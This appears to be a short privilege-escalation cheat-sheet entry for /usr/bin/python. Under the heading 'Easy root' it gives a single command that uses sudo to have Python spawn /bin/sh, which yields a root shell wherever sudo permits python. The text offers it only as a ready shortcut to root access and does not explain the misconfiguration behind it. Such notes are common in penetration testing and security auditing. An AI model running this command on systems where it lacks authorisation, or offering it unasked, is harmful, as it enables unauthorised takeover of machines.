/usr/bin/python

Easy root:

sudo python -c 'import os; os.system("/bin/sh")'

#root

Last updated